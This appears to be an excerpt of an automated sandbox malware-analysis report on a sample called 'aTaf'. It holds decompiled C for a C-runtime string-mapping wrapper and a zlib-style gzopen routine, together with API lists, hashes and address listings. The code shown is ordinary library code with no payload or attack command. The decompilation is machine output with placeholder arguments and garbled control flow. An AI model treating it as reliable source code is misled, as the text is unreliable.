                              • Instruction ID: 48fd7b9dfdaf466b32f6cb94f21b0f23b5ef15627c34572eaf222eb5b342a239
                              • Opcode Fuzzy Hash: ae75fc8c093f7e9f6b878a788f5ef27d36d5e75305522888a43586f13dd1e25d
                              • Instruction Fuzzy Hash: AC217F2544E7D48FC313AB7498660817FB16E53120B1E89DBC4C68F4B3DA68594DDB73
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_500000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                              • Instruction ID: cb338683bbbbb770a5ec9f26ce2a43e2f4ac44bafd8af397dcfe8ba9a35ecf79
                              • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                              • Instruction Fuzzy Hash: B401A277A006048FDF21DF64C805BAF37E9FB86316F4544A5D90AA72C2E774A9818B90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 86%
                              			E00417081(short* __ecx, int _a4, signed int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28, intOrPtr _a32) {
                              				signed int _v8;
                              				int _v12;
                              				int _v16;
                              				int _v20;
                              				intOrPtr _v24;
                              				void* _v36;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* __ebp;
                              				signed int _t110;
                              				intOrPtr _t112;
                              				intOrPtr _t113;
                              				short* _t115;
                              				short* _t116;
                              				char* _t120;
                              				short* _t121;
                              				short* _t123;
                              				short* _t127;
                              				int _t128;
                              				short* _t141;
                              				signed int _t144;
                              				void* _t146;
                              				short* _t147;
                              				signed int _t150;
                              				short* _t153;
                              				char* _t157;
                              				int _t160;
                              				long _t162;
                              				signed int _t174;
                              				signed int _t178;
                              				signed int _t179;
                              				int _t182;
                              				short* _t184;
                              				signed int _t186;
                              				signed int _t188;
                              				short* _t189;
                              				int _t191;
                              				intOrPtr _t194;
                              				int _t207;
                              
                              				_t110 =  *0x422234; // 0x98705858
                              				_v8 = _t110 ^ _t188;
                              				_t184 = __ecx;
                              				_t194 =  *0x423e7c; // 0x1
                              				if(_t194 == 0) {
                              					_t182 = 1;
                              					if(LCMapStringW(0, 0x100, 0x420398, 1, 0, 0) == 0) {
                              						_t162 = GetLastError();
                              						__eflags = _t162 - 0x78;
                              						if(_t162 == 0x78) {
                              							 *0x423e7c = 2;
                              						}
                              					} else {
                              						 *0x423e7c = 1;
                              					}
                              				}
                              				if(_a16 <= 0) {
                              					L13:
                              					_t112 =  *0x423e7c; // 0x1
                              					if(_t112 == 2 || _t112 == 0) {
                              						_v16 = 0;
                              						_v20 = 0;
                              						__eflags = _a4;
                              						if(_a4 == 0) {
                              							_a4 =  *((intOrPtr*)( *_t184 + 0x14));
                              						}
                              						__eflags = _a28;
                              						if(_a28 == 0) {
                              							_a28 =  *((intOrPtr*)( *_t184 + 4));
                              						}
                              						_t113 = E00417A20(0, _t179, _t182, _t184, _a4);
                              						_v24 = _t113;
                              						__eflags = _t113 - 0xffffffff;
                              						if(_t113 != 0xffffffff) {
                              							__eflags = _t113 - _a28;
                              							if(_t113 == _a28) {
                              								_t184 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
                              								L78:
                              								__eflags = _v16;
                              								if(__eflags != 0) {
                              									_push(_v16);
                              									E0040B6B5(0, _t182, _t184, __eflags);
                              								}
                              								_t115 = _v20;
                              								__eflags = _t115;
                              								if(_t115 != 0) {
                              									__eflags = _a20 - _t115;
                              									if(__eflags != 0) {
                              										_push(_t115);
                              										E0040B6B5(0, _t182, _t184, __eflags);
                              									}
                              								}
                              								_t116 = _t184;
                              								goto L84;
                              							}
                              							_t120 = E00417A69(_t179, _a28, _t113, _a12,  &_a16, 0, 0);
                              							_t191 =  &(_t189[0xc]);
                              							_v16 = _t120;
                              							__eflags = _t120;
                              							if(_t120 == 0) {
                              								goto L58;
                              							}
                              							_t121 = LCMapStringA(_a4, _a8, _t120, _a16, 0, 0);
                              							_v12 = _t121;
                              							__eflags = _t121;
                              							if(__eflags != 0) {
                              								if(__eflags <= 0) {
                              									L71:
                              									_t182 = 0;
                              									__eflags = 0;
                              									L72:
                              									__eflags = _t182;
                              									if(_t182 == 0) {
                              										goto L62;
                              									}
                              									E0040BA30(_t182, _t182, 0, _v12);
                              									_t123 = LCMapStringA(_a4, _a8, _v16, _a16, _t182, _v12);
                              									_v12 = _t123;
                              									__eflags = _t123;
                              									if(_t123 != 0) {
                              										_t186 = E00417A69(_t179, _v24, _a28, _t182,  &_v12, _a20, _a24);
                              										_v20 = _t186;
                              										asm("sbb esi, esi");
                              										_t184 =  ~_t186 & _v12;
                              										__eflags = _t184;
                              									} else {
                              										_t184 = 0;
                              									}
                              									E004147AE(_t182);
                              									goto L78;
                              								}
                              								__eflags = _t121 - 0xffffffe0;
                              								if(_t121 > 0xffffffe0) {
                              									goto L71;
                              								}
                              								_t127 =  &(_t121[4]);
                              								__eflags = _t127 - 0x400;
                              								if(_t127 > 0x400) {
                              									_t128 = E0040B84D(0, _t179, _t182, _t127);
                              									__eflags = _t128;
                              									if(_t128 != 0) {
                              										 *_t128 = 0xdddd;
                              										_t128 = _t128 + 8;
                              										__eflags = _t128;
                              									}
                              									_t182 = _t128;
                              									goto L72;
                              								}
                              								E0040CFB0(_t127);
                              								_t182 = _t191;
                              								__eflags = _t182;
                              								if(_t182 == 0) {
                              									goto L62;
                              								}
                              								 *_t182 = 0xcccc;
                              								_t182 = _t182 + 8;
                              								goto L72;
                              							}
                              							L62:
                              							_t184 = 0;
                              							goto L78;
                              						} else {
                              							goto L58;
                              						}
                              					} else {
                              						if(_t112 != 1) {
                              							L58:
                              							_t116 = 0;
                              							L84:
                              							return E0040CE09(_t116, 0, _v8 ^ _t188, _t179, _t182, _t184);
                              						}
                              						_v12 = 0;
                              						if(_a28 == 0) {
                              							_a28 =  *((intOrPtr*)( *_t184 + 4));
                              						}
                              						_t184 = MultiByteToWideChar;
                              						_t182 = MultiByteToWideChar(_a28, 1 + (0 | _a32 != 0x00000000) * 8, _a12, _a16, 0, 0);
                              						_t207 = _t182;
                              						if(_t207 == 0) {
                              							goto L58;
                              						} else {
                              							if(_t207 <= 0) {
                              								L28:
                              								_v16 = 0;
                              								L29:
                              								if(_v16 == 0) {
                              									goto L58;
                              								}
                              								if(MultiByteToWideChar(_a28, 1, _a12, _a16, _v16, _t182) == 0) {
                              									L52:
                              									E004147AE(_v16);
                              									_t116 = _v12;
                              									goto L84;
                              								}
                              								_t184 = LCMapStringW;
                              								_t174 = LCMapStringW(_a4, _a8, _v16, _t182, 0, 0);
                              								_v12 = _t174;
                              								if(_t174 == 0) {
                              									goto L52;
                              								}
                              								if((_a8 & 0x00000400) == 0) {
                              									__eflags = _t174;
                              									if(_t174 <= 0) {
                              										L44:
                              										_t184 = 0;
                              										__eflags = 0;
                              										L45:
                              										__eflags = _t184;
                              										if(_t184 != 0) {
                              											_t141 = LCMapStringW(_a4, _a8, _v16, _t182, _t184, _v12);
                              											__eflags = _t141;
                              											if(_t141 != 0) {
                              												_push(0);
                              												_push(0);
                              												__eflags = _a24;
                              												if(_a24 != 0) {
                              													_push(_a24);
                              													_push(_a20);
                              												} else {
                              													_push(0);
                              													_push(0);
                              												}
                              												_v12 = WideCharToMultiByte(_a28, 0, _t184, _v12, ??, ??, ??, ??);
                              											}
                              											E004147AE(_t184);
                              										}
                              										goto L52;
                              									}
                              									_t144 = 0xffffffe0;
                              									_t179 = _t144 % _t174;
                              									__eflags = _t144 / _t174 - 2;
                              									if(_t144 / _t174 < 2) {
                              										goto L44;
                              									}
                              									_t52 = _t174 + 8; // 0x8
                              									_t146 = _t174 + _t52;
                              									__eflags = _t146 - 0x400;
                              									if(_t146 > 0x400) {
                              										_t147 = E0040B84D(0, _t179, _t182, _t146);
                              										__eflags = _t147;
                              										if(_t147 != 0) {
                              											 *_t147 = 0xdddd;
                              											_t147 =  &(_t147[4]);
                              											__eflags = _t147;
                              										}
                              										_t184 = _t147;
                              										goto L45;
                              									}
                              									E0040CFB0(_t146);
                              									_t184 = _t189;
                              									__eflags = _t184;
                              									if(_t184 == 0) {
                              										goto L52;
                              									}
                              									 *_t184 = 0xcccc;
                              									_t184 =  &(_t184[4]);
                              									goto L45;
                              								}
                              								if(_a24 != 0 && _t174 <= _a24) {
                              									LCMapStringW(_a4, _a8, _v16, _t182, _a20, _a24);
                              								}
                              								goto L52;
                              							}
                              							_t150 = 0xffffffe0;
                              							_t179 = _t150 % _t182;
                              							if(_t150 / _t182 < 2) {
                              								goto L28;
                              							}
                              							_t25 = _t182 + 8; // 0x8
                              							_t152 = _t182 + _t25;
                              							if(_t182 + _t25 > 0x400) {
                              								_t153 = E0040B84D(0, _t179, _t182, _t152);
                              								__eflags = _t153;
                              								if(_t153 == 0) {
                              									L27:
                              									_v16 = _t153;
                              									goto L29;
                              								}
                              								 *_t153 = 0xdddd;
                              								L26:
                              								_t153 =  &(_t153[4]);
                              								goto L27;
                              							}
                              							E0040CFB0(_t152);
                              							_t153 = _t189;
                              							if(_t153 == 0) {
                              								goto L27;
                              							}
                              							 *_t153 = 0xcccc;
                              							goto L26;
                              						}
                              					}
                              				}
                              				_t178 = _a16;
                              				_t157 = _a12;
                              				while(1) {
                              					_t178 = _t178 - 1;
                              					if( *_t157 == 0) {
                              						break;
                              					}
                              					_t157 =  &(_t157[1]);
                              					if(_t178 != 0) {
                              						continue;
                              					}
                              					_t178 = _t178 | 0xffffffff;
                              					break;
                              				}
                              				_t160 = _a16 - _t178 - 1;
                              				if(_t160 < _a16) {
                              					_t160 = _t160 + 1;
                              				}
                              				_a16 = _t160;
                              				goto L13;
                              			}











































                              0x00417089
                              0x00417090
                              0x00417098
                              0x0041709a
                              0x004170a0
                              0x004170a6
                              0x004170bb
                              0x004170c5
                              0x004170cb
                              0x004170ce
                              0x004170d0
                              0x004170d0
                              0x004170bd
                              0x004170bd
                              0x004170bd
                              0x004170bb
                              0x004170dd
                              0x00417101
                              0x00417101
                              0x00417109
                              0x004172bb
                              0x004172be
                              0x004172c1
                              0x004172c4
                              0x004172cb
                              0x004172cb
                              0x004172ce
                              0x004172d1
                              0x004172d8
                              0x004172d8
                              0x004172de
                              0x004172e4
                              0x004172e7
                              0x004172ea
                              0x004172f3
                              0x004172f6
                              0x004173ef
                              0x004173f1
                              0x004173f1
                              0x004173f4
                              0x004173f6
                              0x004173f9
                              0x004173fe
                              0x004173ff
                              0x00417402
                              0x00417404
                              0x00417406
                              0x00417409
                              0x0041740b
                              0x0041740c
                              0x00417411
                              0x00417409
                              0x00417412
                              0x00000000
                              0x00417412
                              0x00417309
                              0x0041730e
                              0x00417311
                              0x00417314
                              0x00417316
                              0x00000000
                              0x00000000
                              0x0041732a
                              0x0041732c
                              0x0041732f
                              0x00417331
                              0x0041733a
                              0x00417379
                              0x00417379
                              0x00417379
                              0x0041737b
                              0x0041737b
                              0x0041737d
                              0x00000000
                              0x00000000
                              0x00417384
                              0x0041739c
                              0x0041739e
                              0x004173a1
                              0x004173a3
                              0x004173bf
                              0x004173c1
                              0x004173c9
                              0x004173cb
                              0x004173cb
                              0x004173a5
                              0x004173a5
                              0x004173a5
                              0x004173cf
                              0x00000000
                              0x004173d4
                              0x0041733c
                              0x0041733f
                              0x00000000
                              0x00000000
                              0x00417341
                              0x00417344
                              0x00417349
                              0x00417362
                              0x00417368
                              0x0041736a
                              0x0041736c
                              0x00417372
                              0x00417372
                              0x00417372
                              0x00417375
                              0x00000000
                              0x00417375
                              0x0041734b
                              0x00417350
                              0x00417352
                              0x00417354
                              0x00000000
                              0x00000000
                              0x00417356
                              0x0041735c
                              0x00000000
                              0x0041735c
                              0x00417333
                              0x00417333
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00417117
                              0x0041711a
                              0x004172ec
                              0x004172ec
                              0x00417414
                              0x00417425
                              0x00417425
                              0x00417120
                              0x00417126
                              0x0041712d
                              0x0041712d
                              0x00417130
                              0x00417153
                              0x00417155
                              0x00417157
                              0x00000000
                              0x0041715d
                              0x0041715d
                              0x004171a2
                              0x004171a2
                              0x004171a5
                              0x004171a8
                              0x00000000
                              0x00000000
                              0x004171c1
                              0x004172aa
                              0x004172ad
                              0x004172b2
                              0x00000000
                              0x004172b5
                              0x004171c7
                              0x004171db
                              0x004171dd
                              0x004171e2
                              0x00000000
                              0x00000000
                              0x004171ef
                              0x0041721a
                              0x0041721c
                              0x00417263
                              0x00417263
                              0x00417263
                              0x00417265
                              0x00417265
                              0x00417267
                              0x00417277
                              0x0041727d
                              0x0041727f
                              0x00417281
                              0x00417282
                              0x00417283
                              0x00417286
                              0x0041728c
                              0x0041728f
                              0x00417288
                              0x00417288
                              0x00417289
                              0x00417289
                              0x004172a0
                              0x004172a0
                              0x004172a4
                              0x004172a9
                              0x00000000
                              0x00417267
                              0x00417222
                              0x00417223
                              0x00417225
                              0x00417228
                              0x00000000
                              0x00000000
                              0x0041722a
                              0x0041722a
                              0x0041722e
                              0x00417233
                              0x0041724c
                              0x00417252
                              0x00417254
                              0x00417256
                              0x0041725c
                              0x0041725c
                              0x0041725c
                              0x0041725f
                              0x00000000
                              0x0041725f
                              0x00417235
                              0x0041723a
                              0x0041723c
                              0x0041723e
                              0x00000000
                              0x00000000
                              0x00417240
                              0x00417246
                              0x00000000
                              0x00417246
                              0x004171f4
                              0x00417213
                              0x00417213
                              0x00000000
                              0x004171f4
                              0x00417163
                              0x00417164
                              0x00417169
                              0x00000000
                              0x00000000
                              0x0041716b
                              0x0041716b
                              0x00417174
                              0x0041718a
                              0x00417190
                              0x00417192
                              0x0041719d
                              0x0041719d
                              0x00000000
                              0x0041719d
                              0x00417194
                              0x0041719a
                              0x0041719a
                              0x00000000
                              0x0041719a
                              0x00417176
                              0x0041717b
                              0x0041717f
                              0x00000000
                              0x00000000
                              0x00417181
                              0x00000000
                              0x00417181
                              0x00417157
                              0x00417109
                              0x004170df
                              0x004170e2
                              0x004170e5
                              0x004170e5
                              0x004170e8
                              0x00000000
                              0x00000000
                              0x004170ea
                              0x004170ed
                              0x00000000
                              0x00000000
                              0x004170ef
                              0x00000000
                              0x004170ef
                              0x004170f7
                              0x004170fb
                              0x004170fd
                              0x004170fd
                              0x004170fe
                              0x00000000

                              APIs
                              • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                              • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,01FD18A8), ref: 004170C5
                              • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                              • _malloc.LIBCMT ref: 0041718A
                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                              • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                              • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                              • _malloc.LIBCMT ref: 0041724C
                              • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                              • __freea.LIBCMT ref: 004172A4
                              • __freea.LIBCMT ref: 004172AD
                              • ___ansicp.LIBCMT ref: 004172DE
                              • ___convertcp.LIBCMT ref: 00417309
                              • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                              • _malloc.LIBCMT ref: 00417362
                              • _memset.LIBCMT ref: 00417384
                              • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                              • ___convertcp.LIBCMT ref: 004173BA
                              • __freea.LIBCMT ref: 004173CF
                              • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                              Memory Dump Source
                              • Source File: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000002.00000002.414829650.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000002.00000002.414829650.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_400000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                              • String ID:
                              • API String ID: 3809854901-0
                              • Opcode ID: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
                              • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                              • Opcode Fuzzy Hash: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
                              • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 0051731A
                              • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,00423620), ref: 0051732C
                              • _malloc.LIBCMT ref: 005173F1
                              • _malloc.LIBCMT ref: 005174B3
                              • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 005174DE
                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 00517501
                              • __freea.LIBCMT ref: 0051750B
                              • __freea.LIBCMT ref: 00517514
                              • ___ansicp.LIBCMT ref: 00517545
                              • ___convertcp.LIBCMT ref: 00517570
                              • _malloc.LIBCMT ref: 005175C9
                              • _memset.LIBCMT ref: 005175EB
                              • ___convertcp.LIBCMT ref: 00517621
                              • __freea.LIBCMT ref: 00517636
                              • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00517650
                              Memory Dump Source
                              • Source File: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_500000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: String__freea_malloc$___convertcp$ByteCharErrorLastMultiWide___ansicp_memset
                              • String ID:
                              • API String ID: 2918745354-0
                              • Opcode ID: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
                              • Instruction ID: f0cd8df5f755df380bdf57c596c2208189620f28e4eb0385d4c6f61c169ed092
                              • Opcode Fuzzy Hash: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
                              • Instruction Fuzzy Hash: 82B19B7290411EAFEF219FA8CC848EE7FB6FB4C354F158869F915A6160D7318D90DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00421320,0000000C,00510977,00000000,00000000,?,00000001,0050C22D,0050B993), ref: 0051084E
                              • __crt_waiting_on_module_handle.LIBCMT ref: 00510859
                                • Part of subcall function 0050E9D1: Sleep.KERNEL32(000003E8,00000000,?,0051079F,KERNEL32.DLL,?,005107EB,?,00000001,0050C22D,0050B993), ref: 0050E9DD
                                • Part of subcall function 0050E9D1: GetModuleHandleW.KERNEL32(00000001,?,0051079F,KERNEL32.DLL,?,005107EB,?,00000001,0050C22D,0050B993), ref: 0050E9E6
                              • __lock.LIBCMT ref: 005108B4
                              • InterlockedIncrement.KERNEL32(?), ref: 005108C1
                              • __lock.LIBCMT ref: 005108D5
                              • ___addlocaleref.LIBCMT ref: 005108F3
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_500000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: HandleModule__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                              • String ID: @.B$KERNEL32.DLL
                              • API String ID: 4021795732-2520587274
                              • Opcode ID: 6494f875005ce20cdce955d8c22516ac3ccd9d7187ee8c814306de8b46833c7d
                              • Instruction ID: c5c78f86d83f09b354ebb78029e9123bf684ce9cab3b9b7ebcad494213115049
                              • Opcode Fuzzy Hash: 6494f875005ce20cdce955d8c22516ac3ccd9d7187ee8c814306de8b46833c7d
                              • Instruction Fuzzy Hash: 9C117871944701AEE720AF75D805B9EBFF0BF44310F50492EE459972E2CBB499858F58
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 83%
                              			E004057B0(intOrPtr* __eax) {
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* __ebp;
                              				intOrPtr* _t57;
                              				char* _t60;
                              				char _t62;
                              				intOrPtr _t63;
                              				char _t64;
                              				intOrPtr _t65;
                              				intOrPtr _t66;
                              				intOrPtr _t67;
                              				intOrPtr _t69;
                              				intOrPtr _t70;
                              				intOrPtr _t74;
                              				intOrPtr _t79;
                              				intOrPtr _t82;
                              				intOrPtr* _t83;
                              				void* _t86;
                              				char* _t88;
                              				char* _t89;
                              				intOrPtr* _t91;
                              				intOrPtr* _t93;
                              				signed int _t97;
                              				signed int _t98;
                              				void* _t100;
                              				void* _t101;
                              				void* _t102;
                              				void* _t103;
                              				void* _t104;
                              
                              				_t98 = _t97 | 0xffffffff;
                              				 *((intOrPtr*)(_t100 + 0xc)) = 0;
                              				_t91 = __eax;
                              				 *((intOrPtr*)(_t100 + 0x10)) = _t100 + 0x10;
                              				if( *((intOrPtr*)(_t100 + 0x68)) == 0 || __eax == 0) {
                              					__eflags = 0;
                              					return 0;
                              				} else {
                              					_t93 = E0040B84D(0, _t86, __eax, 0x74);
                              					_t101 = _t100 + 4;
                              					if(_t93 == 0) {
                              						L31:
                              						return 0;
                              					} else {
                              						 *((intOrPtr*)(_t93 + 0x20)) = 0;
                              						 *((intOrPtr*)(_t93 + 0x24)) = 0;
                              						 *((intOrPtr*)(_t93 + 0x28)) = 0;
                              						 *((intOrPtr*)(_t93 + 0x44)) = 0;
                              						 *_t93 = 0;
                              						 *((intOrPtr*)(_t93 + 0x48)) = 0;
                              						 *((intOrPtr*)(_t93 + 0xc)) = 0;
                              						 *((intOrPtr*)(_t93 + 0x10)) = 0;
                              						 *((intOrPtr*)(_t93 + 4)) = 0;
                              						 *((intOrPtr*)(_t93 + 0x40)) = 0;
                              						 *((intOrPtr*)(_t93 + 0x38)) = 0;
                              						 *((intOrPtr*)(_t93 + 0x3c)) = 0;
                              						 *((intOrPtr*)(_t93 + 0x64)) = 0;
                              						 *((intOrPtr*)(_t93 + 0x68)) = 0;
                              						 *(_t93 + 0x6c) = _t98;
                              						 *((intOrPtr*)(_t93 + 0x4c)) = E00403080(0, 0, 0);
                              						_t57 =  *((intOrPtr*)(_t101 + 0x78));
                              						_t102 = _t101 + 0xc;
                              						 *((intOrPtr*)(_t93 + 0x50)) = 0;
                              						 *((intOrPtr*)(_t93 + 0x58)) = 0;
                              						_t87 = _t57 + 1;
                              						do {
                              							_t82 =  *_t57;
                              							_t57 = _t57 + 1;
                              						} while (_t82 != 0);
                              						_t60 = E0040B84D(0, _t87, _t91, _t57 - _t87 + 1);
                              						_t103 = _t102 + 4;
                              						 *((intOrPtr*)(_t93 + 0x54)) = _t60;
                              						if(_t60 == 0) {
                              							L30:
                              							E00405160(0, _t87, _t93);
                              							goto L31;
                              						} else {
                              							_t83 =  *((intOrPtr*)(_t103 + 0x6c));
                              							_t88 = _t60;
                              							goto L7;
                              							L9:
                              							L9:
                              							if( *_t91 == 0x72) {
                              								 *((char*)(_t93 + 0x5c)) = 0x72;
                              							}
                              							_t63 =  *_t91;
                              							if(_t63 == 0x77 || _t63 == 0x61) {
                              								 *((char*)(_t93 + 0x5c)) = 0x77;
                              							}
                              							_t64 =  *_t91;
                              							if(_t64 < 0x30 || _t64 > 0x39) {
                              								__eflags = _t64 - 0x66;
                              								if(_t64 != 0x66) {
                              									__eflags = _t64 - 0x68;
                              									if(_t64 != 0x68) {
                              										__eflags = _t64 - 0x52;
                              										if(_t64 != 0x52) {
                              											_t89 =  *((intOrPtr*)(_t103 + 0x14));
                              											 *_t89 = _t64;
                              											_t87 = _t89 + 1;
                              											__eflags = _t87;
                              											 *((intOrPtr*)(_t103 + 0x14)) = _t87;
                              										} else {
                              											 *((intOrPtr*)(_t103 + 0x10)) = 3;
                              										}
                              									} else {
                              										 *((intOrPtr*)(_t103 + 0x10)) = 2;
                              									}
                              								} else {
                              									 *((intOrPtr*)(_t103 + 0x10)) = 1;
                              								}
                              							} else {
                              								_t98 = _t64 - 0x30;
                              							}
                              							_t91 = _t91 + 1;
                              							if(_t64 == 0) {
                              								goto L26;
                              							}
                              							_t87 = _t103 + 0x68;
                              							if( *((intOrPtr*)(_t103 + 0x14)) != _t103 + 0x68) {
                              								goto L9;
                              							}
                              							L26:
                              							_t65 =  *((intOrPtr*)(_t93 + 0x5c));
                              							if(_t65 == 0) {
                              								goto L30;
                              							} else {
                              								if(_t65 != 0x77) {
                              									_t66 = E0040B84D(0, _t87, _t91, 0x4000);
                              									 *((intOrPtr*)(_t93 + 0x44)) = _t66;
                              									 *_t93 = _t66;
                              									_t67 = E004071A0(_t93, 0xfffffff1, "1.2.3", 0x38);
                              									_t104 = _t103 + 0x14;
                              									__eflags = _t67;
                              									if(_t67 != 0) {
                              										goto L30;
                              									} else {
                              										__eflags =  *((intOrPtr*)(_t93 + 0x44));
                              										if(__eflags == 0) {
                              											goto L30;
                              										} else {
                              											goto L34;
                              										}
                              									}
                              								} else {
                              									_push(0x38);
                              									_push("1.2.3");
                              									_push( *((intOrPtr*)(_t103 + 0x10)));
                              									_push(8);
                              									_push(0xfffffff1);
                              									_push(8);
                              									_push(_t98);
                              									_push(_t93);
                              									_t91 = E00404CE0();
                              									_t79 = E0040B84D(0, _t87, _t91, 0x4000);
                              									_t104 = _t103 + 0x24;
                              									 *((intOrPtr*)(_t93 + 0x48)) = _t79;
                              									 *((intOrPtr*)(_t93 + 0xc)) = _t79;
                              									if(_t91 != 0 || _t79 == 0) {
                              										goto L30;
                              									} else {
                              										L34:
                              										 *((intOrPtr*)(_t93 + 0x10)) = 0x4000;
                              										 *((intOrPtr*)(E0040BFC1(__eflags))) = 0;
                              										_t69 =  *((intOrPtr*)(_t104 + 0x70));
                              										__eflags = _t69;
                              										_push(_t104 + 0x18);
                              										if(__eflags >= 0) {
                              											_push(_t69);
                              											_t70 = E0040C953(0, _t87, _t91, _t93, __eflags);
                              										} else {
                              											_t87 =  *((intOrPtr*)(_t104 + 0x70));
                              											_push( *((intOrPtr*)(_t104 + 0x70)));
                              											_t70 = E0040CB9D();
                              										}
                              										 *((intOrPtr*)(_t93 + 0x40)) = _t70;
                              										__eflags = _t70;
                              										if(_t70 == 0) {
                              											goto L30;
                              										} else {
                              											__eflags =  *((char*)(_t93 + 0x5c)) - 0x77;
                              											if( *((char*)(_t93 + 0x5c)) != 0x77) {
                              												E00405000(_t93, 0);
                              												_push( *((intOrPtr*)(_t93 + 0x40)));
                              												_t74 = E0040C8E5(0,  *((intOrPtr*)(_t93 + 0x40)), _t91, _t93, __eflags) -  *((intOrPtr*)(_t93 + 4));
                              												__eflags = _t74;
                              												 *((intOrPtr*)(_t93 + 0x60)) = _t74;
                              												return _t93;
                              											} else {
                              												 *((intOrPtr*)(_t93 + 0x60)) = 0xa;
                              												return _t93;
                              											}
                              										}
                              									}
                              								}
                              							}
                              							goto L42;
                              							L7:
                              							_t62 =  *_t83;
                              							 *_t88 = _t62;
                              							_t83 = _t83 + 1;
                              							_t88 = _t88 + 1;
                              							if(_t62 != 0) {
                              								goto L7;
                              							} else {
                              								 *((char*)(_t93 + 0x5c)) = 0;
                              							}
                              							goto L9;
                              						}
                              					}
                              				}
                              				L42:
                              			}

































                              0x004057b7
                              0x004057bf
                              0x004057c3
                              0x004057c5
                              0x004057cd
                              0x004059c8
                              0x004059ce
                              0x004057db
                              0x004057e3
                              0x004057e5
                              0x004057ea
                              0x00405921
                              0x0040592a
                              0x004057f0
                              0x004057f3
                              0x004057f6
                              0x004057f9
                              0x004057fc
                              0x004057ff
                              0x00405801
                              0x00405804
                              0x00405807
                              0x0040580a
                              0x0040580d
                              0x00405810
                              0x00405813
                              0x00405816
                              0x00405819
                              0x0040581c
                              0x00405824
                              0x00405827
                              0x0040582b
                              0x0040582e
                              0x00405831
